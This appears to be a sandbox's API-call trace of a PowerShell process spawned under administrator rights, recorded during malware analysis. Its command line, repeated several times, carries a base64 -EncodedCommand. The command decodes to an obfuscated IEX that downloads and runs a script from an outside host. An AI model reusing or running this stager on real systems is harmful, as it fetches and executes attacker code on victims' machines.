	[0327.753] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.753] SetErrorMode (uMode=0x1) returned 0x1
	[0327.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.754] SetErrorMode (uMode=0x1) returned 0x1
	[0327.754] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.754] SetErrorMode (uMode=0x1) returned 0x1
	[0327.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.754] SetErrorMode (uMode=0x1) returned 0x1
	[0327.754] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.755] SetErrorMode (uMode=0x1) returned 0x1
	[0327.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.755] SetErrorMode (uMode=0x1) returned 0x1
	[0327.755] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.755] SetErrorMode (uMode=0x1) returned 0x1
	[0327.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.756] SetErrorMode (uMode=0x1) returned 0x1
	[0327.756] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.756] SetErrorMode (uMode=0x1) returned 0x1
	[0327.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.756] SetErrorMode (uMode=0x1) returned 0x1
	[0327.756] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.756] SetErrorMode (uMode=0x1) returned 0x1
	[0327.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.757] SetErrorMode (uMode=0x1) returned 0x1
	[0327.757] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.757] SetErrorMode (uMode=0x1) returned 0x1
	[0327.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.757] SetErrorMode (uMode=0x1) returned 0x1
	[0327.757] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.758] SetErrorMode (uMode=0x1) returned 0x1
	[0327.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.758] SetErrorMode (uMode=0x1) returned 0x1
	[0327.758] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.758] SetErrorMode (uMode=0x1) returned 0x1
	[0327.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.759] SetErrorMode (uMode=0x1) returned 0x1
	[0327.759] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.759] SetErrorMode (uMode=0x1) returned 0x1
	[0327.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.759] SetErrorMode (uMode=0x1) returned 0x1
	[0327.759] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.760] SetErrorMode (uMode=0x1) returned 0x1
	[0327.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.760] SetErrorMode (uMode=0x1) returned 0x1
	[0327.760] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x197520
	[0327.761] FindNextFileW (in: hFindFile=0x197520, lpFindFileData=0x1c87dd30 | out: lpFindFileData=0x1c87dd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.761] FindClose (in: hFindFile=0x197520 | out: hFindFile=0x197520) returned 1
	[0327.761] SetErrorMode (uMode=0x1) returned 0x1
	[0328.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c87de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.286] SetErrorMode (uMode=0x1) returned 0x1
	[0328.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c87e050 | out: lpFileInformation=0x1c87e050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.287] SetErrorMode (uMode=0x1) returned 0x1
	[0328.757] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0328.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.758] CoTaskMemFree (pv=0x1b842cf0) 
	[0329.323] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0329.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.323] CoTaskMemFree (pv=0x1b842cf0) 
	[0329.326] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0329.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.326] CoTaskMemFree (pv=0x1b842cf0) 
	[0329.901] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0329.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.901] CoTaskMemFree (pv=0x1b842cf0) 
	[0329.914] CoTaskMemAlloc (cb=0x3b) returned 0x1b88db80
	[0330.598] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c87e238, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c87e238) returned 0x4550
	[0330.599] CoTaskMemFree (pv=0x1b88db80) 
	[0330.603] GetConsoleWindow () returned 0x401b6
	[0330.610] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0330.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0330.610] CoTaskMemFree (pv=0x1b842cf0) 
	[0330.611] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0330.611] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.611] CoTaskMemFree (pv=0x1b842cf0) 
	[0330.616] CoTaskMemAlloc (cb=0x104) returned 0x1b842cf0
	[0330.616] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b842cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0330.616] CoTaskMemFree (pv=0x1b842cf0) 
	[0330.618] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c87e280 | out: pNumArgs=0x1c87e280) returned 0x130c50*=""
	[0330.619] lstrlenW (lpString="-EncodedCommand") returned 15
	[0330.620] CoTaskMemAlloc (cb=0x22) returned 0x1b8752d0
	[0330.620] RtlMoveMemory (in: Destination=0x1b8752d0, Source=0x130c72, Length=0x20 | out: Destination=0x1b8752d0) 
	[0330.620] CoTaskMemFree (pv=0x1b8752d0) 
	[0330.620] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0330.620] CoTaskMemAlloc (cb=0x2f4) returned 0x1b850760
	[0330.620] RtlMoveMemory (in: Destination=0x1b850760, Source=0x130c92, Length=0x2f2 | out: Destination=0x1b850760) 
	[0330.620] CoTaskMemFree (pv=0x1b850760) 
	[0330.621] LocalFree (hMem=0x130c50) returned 0x0
	[0330.645] CoTaskMemAlloc (cb=0x804) returned 0x1b89fb00
	[0330.645] GetConsoleTitleW (in: lpConsoleTitle=0x1b89fb00, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0330.653] CoTaskMemFree (pv=0x1b89fb00) 
	[0331.817] CoTaskMemAlloc (cb=0x38e) returned 0x130c50
	[0331.818] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c87e1e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f84f38 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f84f38*(hProcess=0x36c, hThread=0x368, dwProcessId=0xf6c, dwThreadId=0xf70)) returned 1
	[0331.821] CoTaskMemFree (pv=0x130c50) 
	[0331.828] CloseHandle (hObject=0x368) returned 1
	[0331.829] CoTaskMemAlloc (cb=0x3b) returned 0x1b88db80
	[0331.829] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c87e288, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c87e288) returned 0x4550
	[0331.832] CoTaskMemFree (pv=0x1b88db80) 
	[0331.836] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.836] GetCurrentProcess () returned 0xffffffffffffffff
	[0331.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c87e368, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c87e368*=0x368) returned 1

Process:
	id = "7"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x33f6d000"
	os_pid = "0x7b4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 35
	os_tid = 0x794

	[0241.206] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0242.291] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.291] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0242.292] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0242.292] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0245.775] GetVersionExW (in: lpVersionInformation=0x12dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.777] GetVersionExW (in: lpVersionInformation=0x12dc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.794] GetVersionExW (in: lpVersionInformation=0x12d990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d990*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0245.795] SetErrorMode (uMode=0x1) returned 0x1
	[0245.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12daf0 | out: lpFileInformation=0x12daf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0245.797] SetErrorMode (uMode=0x1) returned 0x1
	[0245.799] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dd60 | out: lpdwHandle=0x12dd60) returned 0x94c
	[0245.801] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572d8 | out: lpData=0x2c572d8) returned 1
	[0245.803] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dcd8, puLen=0x12dcd0 | out: lplpBuffer=0x12dcd8*=0x2c57374, puLen=0x12dcd0) returned 1
	[0245.805] lstrlenW (lpString="䅁") returned 1
	[0245.811] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c57450, puLen=0x12dc40) returned 1
	[0245.812] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0246.227] CoTaskMemAlloc (cb=0x2e) returned 0x25a370
	[0246.228] lstrcpyW (in: lpString1=0x25a370, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
